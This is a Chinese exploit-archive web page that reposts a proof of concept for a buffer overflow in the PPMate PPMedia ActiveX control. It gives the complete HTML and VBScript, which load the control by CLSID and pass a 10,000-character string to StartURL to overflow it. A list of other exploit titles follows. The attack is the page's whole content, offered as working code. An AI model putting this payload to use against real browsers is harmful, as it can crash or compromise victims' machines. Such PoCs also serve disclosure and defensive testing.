手机
当前位置:查字典教程网 >网络安全 >Exploit >PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
摘要:arg1=String(10000,"A")target.StartURL(arg1)

<html>

<body> <object id=target

classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object>

<script language=vbscript> arg1=String(10000, "A")

target.StartURL(arg1) </script>

</body>

</html>

【PPMate PPMedia Class ActiveX Control Buffer Overflow PoC】相关文章:

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Maian Events 2.0 Insecure Cookie Handling Vulnerability

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

EO Video 1.36 Local Heap Overflow DOS / PoC

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

Dana IRC 1.4a Remote Buffer Overflow Exploit

精品推荐
分类导航